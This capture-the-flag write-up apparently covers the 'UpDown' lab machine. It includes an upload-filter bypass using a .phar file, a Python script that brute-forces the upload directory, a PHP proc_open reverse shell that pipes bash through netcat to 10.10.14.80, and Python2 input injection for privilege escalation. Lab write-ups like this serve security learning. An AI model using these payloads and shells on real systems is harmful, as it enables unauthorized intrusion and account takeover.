PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA) | 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA) |_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Is my Website up ? |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
A common theme, not much to go off from the first scan. We’ll poke at the web app while we do an all ports scan.
We find a website checker, which does attempt to connect out – that’ll be something to dig into.
Debug mode also dispalys whatever is on the page; sadly only displays the text and doesn’t render through PHP.
After a lot of playing around, we find it is vulnerable to all kinds of XSS but not a lot else…
Back to enumeration and we find the subdomain dev.siteisup.htb which gives a 403 and http://siteisup.htb/dev/.git, so using wget we can download the folder and see what’s been added.
wget -r http://siteisup.htb/dev/.git
This seems to suggest that to access dev. we need to set this header.
# Check if extension is allowed.
+ $ext = getExtension($file);
+ if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
+ die("Extension not allowed!");
+ }
+
+ # Create directory to upload our file.
+ $dir = "uploads/".md5(time())."/";
+ if(!is_dir($dir)){
+ mkdir($dir, 0770, true); We know there’s file upload filters, but we’re able to sneak a php file with the .phar extension. Now we’ll just have to build a script to fuzz for directories. Continuing with the code we can see that it’ll upload to this generated directory and after parsing delete, so we have to add a bunch of urls to our script to delay things. Hopefully it’ll give us time to fuzz for our shell.
import requests
import sys
import hashlib
import time
t = int(time.time())-50
te = t + 1000
while t < te:
t = t + 1
loc = str(t)
d = hashlib.md5(loc.encode('utf-8')).hexdigest()
url = (f"http://dev.siteisup.htb/uploads/" + d + "/shell.phar")
headers= {"Referer":"127.0.0.1", "Special-Dev":"only4dev"}
response = requests.get(url, headers=headers)
#print(url)
if response.status_code==200:
print("[+] Shell = " + url)
sys.exit()Unfortunately the standard PHP reverse shell doesn’t work. Uploading a PHPinfo file to inspect shows us why…
Most commands are blocked. fopen, exec, fsockopen etc. Navigating through lots of alternatives we eventually discover that we can use proc_open, and conveniently there’s a PHP shell used as an example at the bottom of the man page: https://www.php.net/manual/en/function.proc-open.php
<?php
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/be.txt", "a")
);
$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('bash', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.80 1234 >/tmp/f');
fclose($pipes[0]);
fclose($pipes[1]);
}
?>We pad the start of the script with a bunch of URLs to delay things, run our script and…
Now for our user flag, we find inside /home/developer/dev two files. A python file and a compiled binary of apparently the same file. It’s Python2 and asks us for input.
The file is owner by the user developer, so if we can get code execution we can escalate to this user. Luckily Python2 is vulnerable to simple code injection, so creating a simple python reverse shell inside /tmp and executing it from the command prompt pops us into the new user.
Welcome to 'siteisup.htb' application
Enter URL here:execfile('/tmp/shell.py')
We do also manage to grab some SSH keys so we don’t have to shuffle through gross shells anymore.
developer@updown:/dev/shm$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_install